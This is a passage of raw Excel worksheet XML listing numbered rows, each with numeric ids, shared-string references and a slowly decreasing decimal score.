      <c r="D10779" s="2">
        <v>1.0</v>
      </c>
      <c r="E10779" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10779" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10780" ht="15.75" customHeight="1">
      <c r="A10780" s="1">
        <v>20285.0</v>
      </c>
      <c r="B10780" s="2">
        <v>1.118957E7</v>
      </c>
      <c r="C10780" s="2" t="s">
        <v>10329</v>
      </c>
      <c r="D10780" s="2">
        <v>1.0</v>
      </c>
      <c r="E10780" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10780" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10781" ht="15.75" customHeight="1">
      <c r="A10781" s="1">
        <v>20618.0</v>
      </c>
      <c r="B10781" s="2">
        <v>1.4006084E7</v>
      </c>
      <c r="C10781" s="2" t="s">
        <v>10330</v>
      </c>
      <c r="D10781" s="2">
        <v>1.0</v>
      </c>
      <c r="E10781" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10781" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10782" ht="15.75" customHeight="1">
      <c r="A10782" s="1">
        <v>21213.0</v>
      </c>
      <c r="B10782" s="2">
        <v>1.957962E7</v>
      </c>
      <c r="C10782" s="2" t="s">
        <v>10331</v>
      </c>
      <c r="D10782" s="2">
        <v>1.0</v>
      </c>
      <c r="E10782" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10782" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10783" ht="15.75" customHeight="1">
      <c r="A10783" s="1">
        <v>21246.0</v>
      </c>
      <c r="B10783" s="2">
        <v>1.9928043E7</v>
      </c>
      <c r="C10783" s="2" t="s">
        <v>10332</v>
      </c>
      <c r="D10783" s="2">
        <v>1.0</v>
      </c>
      <c r="E10783" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10783" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10784" ht="15.75" customHeight="1">
      <c r="A10784" s="1">
        <v>21562.0</v>
      </c>
      <c r="B10784" s="2">
        <v>2.3686611E7</v>
      </c>
      <c r="C10784" s="2" t="s">
        <v>10333</v>
      </c>
      <c r="D10784" s="2">
        <v>1.0</v>
      </c>
      <c r="E10784" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10784" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10785" ht="15.75" customHeight="1">
      <c r="A10785" s="1">
        <v>22030.0</v>
      </c>
      <c r="B10785" s="2">
        <v>3.0148425E7</v>
      </c>
      <c r="C10785" s="2" t="s">
        <v>10334</v>
      </c>
      <c r="D10785" s="2">
        <v>1.0</v>
      </c>
      <c r="E10785" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10785" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10786" ht="15.75" customHeight="1">
      <c r="A10786" s="1">
        <v>22055.0</v>
      </c>
      <c r="B10786" s="2">
        <v>3.043197E7</v>
      </c>
      <c r="C10786" s="2" t="s">
        <v>10335</v>
      </c>
      <c r="D10786" s="2">
        <v>1.0</v>
      </c>
      <c r="E10786" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10786" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10787" ht="15.75" customHeight="1">
      <c r="A10787" s="1">
        <v>22192.0</v>
      </c>
      <c r="B10787" s="2">
        <v>3.181028E7</v>
      </c>
      <c r="C10787" s="2" t="s">
        <v>10336</v>
      </c>
      <c r="D10787" s="2">
        <v>1.0</v>
      </c>
      <c r="E10787" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10787" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10788" ht="15.75" customHeight="1">
      <c r="A10788" s="1">
        <v>22339.0</v>
      </c>
      <c r="B10788" s="2">
        <v>3.4460485E7</v>
      </c>
      <c r="C10788" s="2" t="s">
        <v>10337</v>
      </c>
      <c r="D10788" s="2">
        <v>1.0</v>
      </c>
      <c r="E10788" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10788" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10789" ht="15.75" customHeight="1">
      <c r="A10789" s="1">
        <v>23329.0</v>
      </c>
      <c r="B10789" s="2">
        <v>5.457791E7</v>
      </c>
      <c r="C10789" s="2" t="s">
        <v>10338</v>
      </c>
      <c r="D10789" s="2">
        <v>1.0</v>
      </c>
      <c r="E10789" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10789" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10790" ht="15.75" customHeight="1">
      <c r="A10790" s="1">
        <v>23789.0</v>
      </c>
      <c r="B10790" s="2">
        <v>7703986.0</v>
      </c>
      <c r="C10790" s="2" t="s">
        <v>10339</v>
      </c>
      <c r="D10790" s="2">
        <v>1.0</v>
      </c>
      <c r="E10790" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10790" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10791" ht="15.75" customHeight="1">
      <c r="A10791" s="1">
        <v>24064.0</v>
      </c>
      <c r="B10791" s="2">
        <v>9610079.0</v>
      </c>
      <c r="C10791" s="2" t="s">
        <v>10340</v>
      </c>
      <c r="D10791" s="2">
        <v>1.0</v>
      </c>
      <c r="E10791" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10791" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10792" ht="15.75" customHeight="1">
      <c r="A10792" s="1">
        <v>24525.0</v>
      </c>
      <c r="B10792" s="2">
        <v>1.1173598E7</v>
      </c>
      <c r="C10792" s="2" t="s">
        <v>10328</v>
      </c>
      <c r="D10792" s="2">
        <v>1.0</v>
      </c>
      <c r="E10792" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10792" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10793" ht="15.75" customHeight="1">
      <c r="A10793" s="1">
        <v>24529.0</v>
      </c>
      <c r="B10793" s="2">
        <v>1.1189569E7</v>
      </c>
      <c r="C10793" s="2" t="s">
        <v>10329</v>
      </c>
      <c r="D10793" s="2">
        <v>1.0</v>
      </c>
      <c r="E10793" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10793" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10794" ht="15.75" customHeight="1">
      <c r="A10794" s="1">
        <v>24729.0</v>
      </c>
      <c r="B10794" s="2">
        <v>1.173305E7</v>
      </c>
      <c r="C10794" s="2" t="s">
        <v>10341</v>
      </c>
      <c r="D10794" s="2">
        <v>1.0</v>
      </c>
      <c r="E10794" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10794" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10795" ht="15.75" customHeight="1">
      <c r="A10795" s="1">
        <v>24876.0</v>
      </c>
      <c r="B10795" s="2">
        <v>1.2228573E7</v>
      </c>
      <c r="C10795" s="2" t="s">
        <v>10342</v>
      </c>
      <c r="D10795" s="2">
        <v>1.0</v>
      </c>
      <c r="E10795" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10795" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10796" ht="15.75" customHeight="1">
      <c r="A10796" s="1">
        <v>24946.0</v>
      </c>
      <c r="B10796" s="2">
        <v>1.2520227E7</v>
      </c>
      <c r="C10796" s="2" t="s">
        <v>10343</v>
      </c>
      <c r="D10796" s="2">
        <v>1.0</v>
      </c>
      <c r="E10796" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10796" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10797" ht="15.75" customHeight="1">
      <c r="A10797" s="1">
        <v>25888.0</v>
      </c>
      <c r="B10797" s="2">
        <v>1.4973273E7</v>
      </c>
      <c r="C10797" s="2" t="s">
        <v>10344</v>
      </c>
      <c r="D10797" s="2">
        <v>1.0</v>
      </c>
      <c r="E10797" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10797" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10798" ht="15.75" customHeight="1">
      <c r="A10798" s="1">
        <v>25892.0</v>
      </c>
      <c r="B10798" s="2">
        <v>1.498375E7</v>
      </c>
      <c r="C10798" s="2" t="s">
        <v>10345</v>
      </c>
      <c r="D10798" s="2">
        <v>1.0</v>
      </c>
      <c r="E10798" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10798" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10799" ht="15.75" customHeight="1">
      <c r="A10799" s="1">
        <v>26649.0</v>
      </c>
      <c r="B10799" s="2">
        <v>1.8048644E7</v>
      </c>
      <c r="C10799" s="2" t="s">
        <v>10346</v>
      </c>
      <c r="D10799" s="2">
        <v>1.0</v>
      </c>
      <c r="E10799" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10799" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10800" ht="15.75" customHeight="1">
      <c r="A10800" s="1">
        <v>27471.0</v>
      </c>
      <c r="B10800" s="2">
        <v>2.1988222E7</v>
      </c>
      <c r="C10800" s="2" t="s">
        <v>10347</v>
      </c>
      <c r="D10800" s="2">
        <v>1.0</v>
      </c>
      <c r="E10800" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10800" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10801" ht="15.75" customHeight="1">
      <c r="A10801" s="1">
        <v>29037.0</v>
      </c>
      <c r="B10801" s="2">
        <v>3.0148424E7</v>
      </c>
      <c r="C10801" s="2" t="s">
        <v>10348</v>
      </c>
      <c r="D10801" s="2">
        <v>1.0</v>
      </c>
      <c r="E10801" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10801" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10802" ht="15.75" customHeight="1">
      <c r="A10802" s="1">
        <v>29458.0</v>
      </c>
      <c r="B10802" s="2">
        <v>3.2308905E7</v>
      </c>
      <c r="C10802" s="2" t="s">
        <v>10212</v>
      </c>
      <c r="D10802" s="2">
        <v>1.0</v>
      </c>
      <c r="E10802" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10802" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10803" ht="15.75" customHeight="1">
      <c r="A10803" s="1">
        <v>29670.0</v>
      </c>
      <c r="B10803" s="2">
        <v>3.3977785E7</v>
      </c>
      <c r="C10803" s="2" t="s">
        <v>10349</v>
      </c>
      <c r="D10803" s="2">
        <v>1.0</v>
      </c>
      <c r="E10803" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10803" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10804" ht="15.75" customHeight="1">
      <c r="A10804" s="1">
        <v>30145.0</v>
      </c>
      <c r="B10804" s="2">
        <v>3.7042415E7</v>
      </c>
      <c r="C10804" s="2" t="s">
        <v>10350</v>
      </c>
      <c r="D10804" s="2">
        <v>1.0</v>
      </c>
      <c r="E10804" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10804" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10805" ht="15.75" customHeight="1">
      <c r="A10805" s="1">
        <v>30744.0</v>
      </c>
      <c r="B10805" s="2">
        <v>4.4053739E7</v>
      </c>
      <c r="C10805" s="2" t="s">
        <v>10351</v>
      </c>
      <c r="D10805" s="2">
        <v>1.0</v>
      </c>
      <c r="E10805" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10805" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10806" ht="15.75" customHeight="1">
      <c r="A10806" s="1">
        <v>30826.0</v>
      </c>
      <c r="B10806" s="2">
        <v>4541322.0</v>
      </c>
      <c r="C10806" s="2" t="s">
        <v>10352</v>
      </c>
      <c r="D10806" s="2">
        <v>1.0</v>
      </c>
      <c r="E10806" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10806" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10807" ht="15.75" customHeight="1">
      <c r="A10807" s="1">
        <v>32044.0</v>
      </c>
      <c r="B10807" s="2">
        <v>5369993.0</v>
      </c>
      <c r="C10807" s="2" t="s">
        <v>10353</v>
      </c>
      <c r="D10807" s="2">
        <v>1.0</v>
      </c>
      <c r="E10807" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10807" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10808" ht="15.75" customHeight="1">
      <c r="A10808" s="1">
        <v>32413.0</v>
      </c>
      <c r="B10808" s="2">
        <v>5639405.0</v>
      </c>
      <c r="C10808" s="2" t="s">
        <v>10354</v>
      </c>
      <c r="D10808" s="2">
        <v>1.0</v>
      </c>
      <c r="E10808" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10808" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10809" ht="15.75" customHeight="1">
      <c r="A10809" s="1">
        <v>32431.0</v>
      </c>
      <c r="B10809" s="2">
        <v>5.6549812E7</v>
      </c>
      <c r="C10809" s="2" t="s">
        <v>10355</v>
      </c>
      <c r="D10809" s="2">
        <v>1.0</v>
      </c>
      <c r="E10809" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10809" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10810" ht="15.75" customHeight="1">
      <c r="A10810" s="1">
        <v>33373.0</v>
      </c>
      <c r="B10810" s="2">
        <v>7632037.0</v>
      </c>
      <c r="C10810" s="2" t="s">
        <v>10356</v>
      </c>
      <c r="D10810" s="2">
        <v>1.0</v>
      </c>
      <c r="E10810" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10810" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10811" ht="15.75" customHeight="1">
      <c r="A10811" s="1">
        <v>33772.0</v>
      </c>
      <c r="B10811" s="2">
        <v>8671843.0</v>
      </c>
      <c r="C10811" s="2" t="s">
        <v>10357</v>
      </c>
      <c r="D10811" s="2">
        <v>1.0</v>
      </c>
      <c r="E10811" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10811" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10812" ht="15.75" customHeight="1">
      <c r="A10812" s="1">
        <v>33884.0</v>
      </c>
      <c r="B10812" s="2">
        <v>9131108.0</v>
      </c>
      <c r="C10812" s="2" t="s">
        <v>10358</v>
      </c>
      <c r="D10812" s="2">
        <v>1.0</v>
      </c>
      <c r="E10812" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10812" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10813" ht="15.75" customHeight="1">
      <c r="A10813" s="1">
        <v>1324.0</v>
      </c>
      <c r="B10813" s="2">
        <v>2.5741401E7</v>
      </c>
      <c r="C10813" s="2" t="s">
        <v>10359</v>
      </c>
      <c r="D10813" s="2">
        <v>1.0</v>
      </c>
      <c r="E10813" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10813" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="10814" ht="15.75" customHeight="1">
      <c r="A10814" s="1">
        <v>7947.0</v>
      </c>
      <c r="B10814" s="2">
        <v>5.2634678E7</v>
      </c>
      <c r="C10814" s="2" t="s">
        <v>10360</v>
      </c>
      <c r="D10814" s="2">
        <v>1.0</v>
      </c>
      <c r="E10814" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10814" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="10815" ht="15.75" customHeight="1">
      <c r="A10815" s="1">
        <v>13928.0</v>
      </c>
      <c r="B10815" s="2">
        <v>3.7105453E7</v>
      </c>
      <c r="C10815" s="2" t="s">
        <v>10361</v>
      </c>
      <c r="D10815" s="2">
        <v>1.0</v>
      </c>
      <c r="E10815" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10815" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="10816" ht="15.75" customHeight="1">
      <c r="A10816" s="1">
        <v>12769.0</v>
      </c>
      <c r="B10816" s="2">
        <v>3.1256754E7</v>
      </c>
      <c r="C10816" s="2" t="s">
        <v>10362</v>
      </c>
      <c r="D10816" s="2">
        <v>1.0</v>
      </c>
      <c r="E10816" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10816" s="2">
        <v>0.0972222222222222</v>
      </c>
    </row>
    <row r="10817" ht="15.75" customHeight="1">
      <c r="A10817" s="1">
        <v>24451.0</v>
      </c>
      <c r="B10817" s="2">
        <v>1.0932752E7</v>
      </c>
      <c r="C10817" s="2" t="s">
        <v>10363</v>
      </c>
      <c r="D10817" s="2">
        <v>1.0</v>
      </c>
      <c r="E10817" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10817" s="2">
        <v>0.0972222222222222</v>
      </c>
    </row>
    <row r="10818" ht="15.75" customHeight="1">
      <c r="A10818" s="1">
        <v>8125.0</v>
      </c>
      <c r="B10818" s="2">
        <v>5.3086349E7</v>
      </c>
      <c r="C10818" s="2" t="s">
        <v>10364</v>
      </c>
      <c r="D10818" s="2">
        <v>1.0</v>
      </c>
      <c r="E10818" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10818" s="2">
        <v>0.0969498910675381</v>
      </c>
    </row>
    <row r="10819" ht="15.75" customHeight="1">
      <c r="A10819" s="1">
        <v>10964.0</v>
      </c>
      <c r="B10819" s="2">
        <v>1.7193014E7</v>
      </c>
      <c r="C10819" s="2" t="s">
        <v>10365</v>
      </c>
      <c r="D10819" s="2">
        <v>1.0</v>
      </c>
      <c r="E10819" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10819" s="2">
        <v>0.0969498910675381</v>
      </c>
    </row>
    <row r="10820" ht="15.75" customHeight="1">
      <c r="A10820" s="1">
        <v>32394.0</v>
      </c>
      <c r="B10820" s="2">
        <v>5625555.0</v>
      </c>
      <c r="C10820" s="2" t="s">
        <v>10366</v>
      </c>
      <c r="D10820" s="2">
        <v>1.0</v>
      </c>
      <c r="E10820" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10820" s="2">
        <v>0.09674329501915707</v>
      </c>
    </row>
    <row r="10821" ht="15.75" customHeight="1">
      <c r="A10821" s="1">
        <v>34251.0</v>
      </c>
      <c r="B10821" s="2">
        <v>4.9249928E7</v>
      </c>
      <c r="C10821" s="2" t="s">
        <v>10367</v>
      </c>
      <c r="D10821" s="2">
        <v>1.0</v>
      </c>
      <c r="E10821" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10821" s="2">
        <v>0.09658119658119657</v>
      </c>
    </row>
    <row r="10822" ht="15.75" customHeight="1">
      <c r="A10822" s="1">
        <v>13275.0</v>
      </c>
      <c r="B10822" s="2">
        <v>3.4392058E7</v>
      </c>
      <c r="C10822" s="2" t="s">
        <v>10368</v>
      </c>
      <c r="D10822" s="2">
        <v>1.0</v>
      </c>
      <c r="E10822" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10822" s="2">
        <v>0.09649122807017543</v>
      </c>
    </row>
    <row r="10823" ht="15.75" customHeight="1">
      <c r="A10823" s="1">
        <v>14633.0</v>
      </c>
      <c r="B10823" s="2">
        <v>4.0311445E7</v>
      </c>
      <c r="C10823" s="2" t="s">
        <v>10369</v>
      </c>
      <c r="D10823" s="2">
        <v>1.0</v>
      </c>
      <c r="E10823" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10823" s="2">
        <v>0.09649122807017543</v>
      </c>
    </row>
    <row r="10824" ht="15.75" customHeight="1">
      <c r="A10824" s="1">
        <v>15036.0</v>
      </c>
      <c r="B10824" s="2">
        <v>4.1567383E7</v>
      </c>
      <c r="C10824" s="2" t="s">
        <v>10370</v>
      </c>
      <c r="D10824" s="2">
        <v>1.0</v>
      </c>
      <c r="E10824" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10824" s="2">
        <v>0.09649122807017543</v>
      </c>
    </row>
    <row r="10825" ht="15.75" customHeight="1">
      <c r="A10825" s="1">
        <v>13345.0</v>
      </c>
      <c r="B10825" s="2">
        <v>3.4694619E7</v>
      </c>
      <c r="C10825" s="2" t="s">
        <v>10371</v>
      </c>
      <c r="D10825" s="2">
        <v>1.0</v>
      </c>
      <c r="E10825" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10825" s="2">
        <v>0.09623015873015872</v>
      </c>
    </row>
    <row r="10826" ht="15.75" customHeight="1">
      <c r="A10826" s="1">
        <v>33382.0</v>
      </c>
      <c r="B10826" s="2">
        <v>7652284.0</v>
      </c>
      <c r="C10826" s="2" t="s">
        <v>10372</v>
      </c>
      <c r="D10826" s="2">
        <v>1.0</v>
      </c>
      <c r="E10826" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10826" s="2">
        <v>0.09623015873015872</v>
      </c>
    </row>
    <row r="10827" ht="15.75" customHeight="1">
      <c r="A10827" s="1">
        <v>1312.0</v>
      </c>
      <c r="B10827" s="2">
        <v>2.5706431E7</v>
      </c>
      <c r="C10827" s="2" t="s">
        <v>10373</v>
      </c>
      <c r="D10827" s="2">
        <v>1.0</v>
      </c>
      <c r="E10827" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10827" s="2">
        <v>0.09595959595959597</v>
      </c>
    </row>
    <row r="10828" ht="15.75" customHeight="1">
      <c r="A10828" s="1">
        <v>777.0</v>
      </c>
      <c r="B10828" s="2">
        <v>2.1108701E7</v>
      </c>
      <c r="C10828" s="2" t="s">
        <v>10374</v>
      </c>
      <c r="D10828" s="2">
        <v>1.0</v>
      </c>
      <c r="E10828" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10828" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="10829" ht="15.75" customHeight="1">
      <c r="A10829" s="1">
        <v>4930.0</v>
      </c>
      <c r="B10829" s="2">
        <v>4.3988028E7</v>
      </c>
      <c r="C10829" s="2" t="s">
        <v>10375</v>
      </c>
      <c r="D10829" s="2">
        <v>1.0</v>
      </c>
      <c r="E10829" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10829" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="10830" ht="15.75" customHeight="1">
      <c r="A10830" s="1">
        <v>12898.0</v>
      </c>
      <c r="B10830" s="2">
        <v>3.2070795E7</v>
      </c>
      <c r="C10830" s="2" t="s">
        <v>10376</v>
      </c>
      <c r="D10830" s="2">
        <v>1.0</v>
      </c>
      <c r="E10830" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10830" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="10831" ht="15.75" customHeight="1">
      <c r="A10831" s="1">
        <v>13580.0</v>
      </c>
      <c r="B10831" s="2">
        <v>3.5728209E7</v>
      </c>
      <c r="C10831" s="2" t="s">
        <v>10377</v>
      </c>
      <c r="D10831" s="2">
        <v>1.0</v>
      </c>
      <c r="E10831" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10831" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="10832" ht="15.75" customHeight="1">
      <c r="A10832" s="1">
        <v>30499.0</v>
      </c>
      <c r="B10832" s="2">
        <v>3997669.0</v>
      </c>
      <c r="C10832" s="2" t="s">
        <v>10167</v>
      </c>
      <c r="D10832" s="2">
        <v>1.0</v>
      </c>
      <c r="E10832" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10832" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="10833" ht="15.75" customHeight="1">
      <c r="A10833" s="1">
        <v>30986.0</v>
      </c>
      <c r="B10833" s="2">
        <v>4756840.0</v>
      </c>
      <c r="C10833" s="2" t="s">
        <v>10378</v>
      </c>
      <c r="D10833" s="2">
        <v>1.0</v>
      </c>
      <c r="E10833" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10833" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="10834" ht="15.75" customHeight="1">
      <c r="A10834" s="1">
        <v>32790.0</v>
      </c>
      <c r="B10834" s="2">
        <v>6138398.0</v>
      </c>
      <c r="C10834" s="2" t="s">
        <v>10379</v>
      </c>
      <c r="D10834" s="2">
        <v>1.0</v>
      </c>
      <c r="E10834" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10834" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="10835" ht="15.75" customHeight="1">
      <c r="A10835" s="1">
        <v>547.0</v>
      </c>
      <c r="B10835" s="2">
        <v>1.8733802E7</v>
      </c>
      <c r="C10835" s="2" t="s">
        <v>10380</v>
      </c>
      <c r="D10835" s="2">
        <v>1.0</v>
      </c>
      <c r="E10835" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10835" s="2">
        <v>0.09595959595959594</v>
      </c>
    </row>
    <row r="10836" ht="15.75" customHeight="1">
      <c r="A10836" s="1">
        <v>1245.0</v>
      </c>
      <c r="B10836" s="2">
        <v>2.5096587E7</v>
      </c>
      <c r="C10836" s="2" t="s">
        <v>10381</v>
      </c>
      <c r="D10836" s="2">
        <v>1.0</v>
      </c>
      <c r="E10836" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10836" s="2">
        <v>0.09595959595959594</v>
      </c>
    </row>
    <row r="10837" ht="15.75" customHeight="1">
      <c r="A10837" s="1">
        <v>1269.0</v>
      </c>
      <c r="B10837" s="2">
        <v>2.5273828E7</v>
      </c>
      <c r="C10837" s="2" t="s">
        <v>10382</v>
      </c>
      <c r="D10837" s="2">
        <v>1.0</v>
      </c>
      <c r="E10837" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10837" s="2">
        <v>0.09595959595959594</v>
      </c>
    </row>
    <row r="10838" ht="15.75" customHeight="1">
      <c r="A10838" s="1">
        <v>4947.0</v>
      </c>
      <c r="B10838" s="2">
        <v>4.4047021E7</v>
      </c>
      <c r="C10838" s="2" t="s">
        <v>10383</v>
      </c>
      <c r="D10838" s="2">
        <v>1.0</v>
      </c>
      <c r="E10838" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10838" s="2">
        <v>0.09595959595959594</v>
      </c>
    </row>
    <row r="10839" ht="15.75" customHeight="1">
      <c r="A10839" s="1">
        <v>15559.0</v>
      </c>
      <c r="B10839" s="2">
        <v>4.3426859E7</v>
      </c>
      <c r="C10839" s="2" t="s">
        <v>10384</v>
      </c>
      <c r="D10839" s="2">
        <v>1.0</v>
      </c>
      <c r="E10839" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10839" s="2">
        <v>0.09595959595959594</v>
      </c>
    </row>
    <row r="10840" ht="15.75" customHeight="1">
      <c r="A10840" s="1">
        <v>23523.0</v>
      </c>
      <c r="B10840" s="2">
        <v>5858088.0</v>
      </c>
      <c r="C10840" s="2" t="s">
        <v>10385</v>
      </c>
      <c r="D10840" s="2">
        <v>1.0</v>
      </c>
      <c r="E10840" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10840" s="2">
        <v>0.09595959595959594</v>
      </c>
    </row>
    <row r="10841" ht="15.75" customHeight="1">
      <c r="A10841" s="1">
        <v>25540.0</v>
      </c>
      <c r="B10841" s="2">
        <v>1.4255636E7</v>
      </c>
      <c r="C10841" s="2" t="s">
        <v>10386</v>
      </c>
      <c r="D10841" s="2">
        <v>1.0</v>
      </c>
      <c r="E10841" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10841" s="2">
        <v>0.09595959595959594</v>
      </c>
    </row>
    <row r="10842" ht="15.75" customHeight="1">
      <c r="A10842" s="1">
        <v>27703.0</v>
      </c>
      <c r="B10842" s="2">
        <v>2.3036203E7</v>
      </c>
      <c r="C10842" s="2" t="s">
        <v>10387</v>
      </c>
      <c r="D10842" s="2">
        <v>1.0</v>
      </c>
      <c r="E10842" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10842" s="2">
        <v>0.09595959595959594</v>
      </c>
    </row>
    <row r="10843" ht="15.75" customHeight="1">
      <c r="A10843" s="1">
        <v>13673.0</v>
      </c>
      <c r="B10843" s="2">
        <v>3.6018025E7</v>
      </c>
      <c r="C10843" s="2" t="s">
        <v>10388</v>
      </c>
      <c r="D10843" s="2">
        <v>1.0</v>
      </c>
      <c r="E10843" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10843" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="10844" ht="15.75" customHeight="1">
      <c r="A10844" s="1">
        <v>20094.0</v>
      </c>
      <c r="B10844" s="2">
        <v>9589931.0</v>
      </c>
      <c r="C10844" s="2" t="s">
        <v>10389</v>
      </c>
      <c r="D10844" s="2">
        <v>1.0</v>
      </c>
      <c r="E10844" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10844" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="10845" ht="15.75" customHeight="1">
      <c r="A10845" s="1">
        <v>23357.0</v>
      </c>
      <c r="B10845" s="2">
        <v>5.4957277E7</v>
      </c>
      <c r="C10845" s="2" t="s">
        <v>10390</v>
      </c>
      <c r="D10845" s="2">
        <v>1.0</v>
      </c>
      <c r="E10845" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10845" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="10846" ht="15.75" customHeight="1">
      <c r="A10846" s="1">
        <v>23980.0</v>
      </c>
      <c r="B10846" s="2">
        <v>9110523.0</v>
      </c>
      <c r="C10846" s="2" t="s">
        <v>10391</v>
      </c>
      <c r="D10846" s="2">
        <v>1.0</v>
      </c>
